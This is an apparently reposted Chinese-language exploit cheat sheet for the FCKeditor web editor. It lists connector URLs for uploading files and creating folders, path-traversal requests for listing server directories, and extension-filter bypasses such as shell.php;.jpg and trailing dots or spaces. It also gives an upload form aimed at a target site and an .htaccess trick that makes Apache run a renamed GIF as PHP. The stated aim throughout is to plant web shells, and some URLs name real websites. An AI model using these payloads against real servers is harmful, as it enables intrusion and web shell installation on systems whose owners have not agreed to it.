首頁 > 其他

Fckeditor漏洞利用總結

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

標籤:

Fckeditor漏洞利用總結  
查看編輯器版本
FCKeditor/_whatsnew.html
FCKeditor/editor/dialog/fck_about.html
FCKeditor/_samples/default.html
a
editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm

editor/filemanager/connectors/asp/connector.asp
editor/filemanager/connectors/aspx/connector.aspx
editor/filemanager/connectors/php/connector.php
editor/filemanager/browser/default/browser.html


FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp後在/up_files/image/目錄下建立一個明文qing.asp的檔案夾。
2.5

a.aspx.a;.a.aspx.jpg..jpg

2.4.3
php的檔案名稱加個問號,成功上傳解析

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
支援php的通殺,2.6.4和2.6.5測試未通過


fckeditor/editor/plugins/bbcode/_sample/sample.html  2.64
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 環境下在上傳檔案後面加個.突破!測試通過。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在處理PHP 上傳的地方並未對Media 類型進行上傳檔案類型的控制,導致使用者上傳任意檔案!將以下儲存為html檔案,修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
—————————————————————————————————————————————————————————————

4.FCKeditor 檔案上傳“.”變“_”底線的繞過方法
        很多時候上傳的檔案例如:shell.php.rar 或shell.php;.jpg 會變為shell_php;.jpg 這是新版FCK 的變化。
    4.1:提交shell.php+空格繞過
不過空格只支援win 系統 *nix 是不支援的[shell.php 和shell.php+空格是2 個不同的檔案 未測試。
    4.2:繼續上傳同名檔案可變為shell.php;(1).jpg 也可以建立一個檔案夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立檔案夾
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 檔案的上傳地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
fckeditor/editor/filemanager/browser/default/frmupload.html
—————————————————————————————————————————————————————————————

7.常用上傳地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://inc.jxbsu.com/fckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測試通過)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意紅色部分修改為FCKeditor 實際使用的指令碼語言,藍色部分可以自訂文
件夾名稱也可以利用../..目錄遍曆,紫色部分為實際網站地址。
—————————————————————————————————————————————————————————————

8.其他上傳地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多網站都已刪除_samples 目錄,可以試試。
FCKeditor/editor/fckeditor.html 不可以上傳檔案,可以點擊上傳圖片按鈕再選擇瀏覽伺服器即可跳轉至可上傳檔案頁。
—————————————————————————————————————————————————————————————

9.列目錄漏洞也可助找上傳地址
Version 2.4.1 測試通過
修改CurrentFolder 參數使用 ../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根據返回的XML 資訊可以查看網站所有的目錄。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接瀏覽盤符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————

10.爆路徑漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————

11. FCKeditor 被動限制策略所導致的過濾不嚴問題
        影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 類別預設拒絕上傳類型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 尾碼的檔案上傳後它儲存的檔案直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension 為尾碼.直接導致在win 下在上傳檔案後面加個.來突破[未測試]!
        而在apache 下,因為"Apache 檔案名稱解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義TYPE 變數時使用File 類別來上傳檔案,根據FCKeditor 的代碼,其限制最為狹隘。
        在上傳時遇見可直接上傳指令檔固然很好,但有些版本可能無法直接上傳可以利用在檔案名稱後面加.點或空格繞過,也可以利用2003 解析漏洞建立xxx.asp檔案夾或者上傳xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞,Type檔案沒有限制!
        我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,因為程式對type=xxx 的類型沒有檢查。我們可以直接構造上傳把type=Image 改成Type=hsren 這樣就可以建立一個叫hsren的檔案夾,一個新類型,沒有任何限制,可以上傳任意指令碼!
—————————————————————————————————————————————————————————————

===============================================================================================================================================

FCK編輯器jsp版本漏洞:
  <2.43

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

上傳馬所在目錄

editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=../../&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上傳shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有關係.並不是百分百成功. 測試成功幾個站.
不能通殺.很遺憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
如果以上地址不行可以試試
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
FCKeditor/_samples/
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/connectors/uploadtest.html





/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.banggood.com%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php




In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : PenTesters.IR
---------------------------------------------------------
1.建立一個htaccess檔案:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.通過fc上傳該htaccess
http://www.xxxx.com /FCKeditor/editor/filemanager/upload/test.html
http://www.xxxx.com /FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://www.2cto.com /anything/shell_php.gif
6.Now shell is available from server.
---------------------------------------------------------

都懂的,利用htaccess使apache將_php.gif解析……

http://www.banggood.com/admin/fckeditor/_samples/default.html

Fckeditor漏洞利用總結

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More